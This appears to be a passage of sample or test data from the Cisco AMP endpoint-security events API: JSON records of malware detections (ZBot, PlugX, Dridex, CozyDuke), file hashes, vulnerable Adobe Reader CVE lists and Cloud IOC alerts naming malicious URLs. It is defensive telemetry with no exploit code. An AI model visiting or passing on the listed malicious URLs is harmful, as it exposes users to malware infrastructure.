Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208098324250639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292803669262360","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":35000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292803669262359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"amdhcp32.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\amdhcp32.dll","identity":{"sha256":"37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7","sha1":"00f67deb6e435c68f8a39336c9effc45d395b134","md5":"6761106f816313394a653db5172dc487"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":33000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292803669262356","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"aticaldd.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\aticaldd.dll","identity":{"sha256":"0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca","sha1":"42cfe068b0f476198b93393840d400424fd77f0c","md5":"d596827d48a3ff836545b3a999f2c3e3"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":27000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat 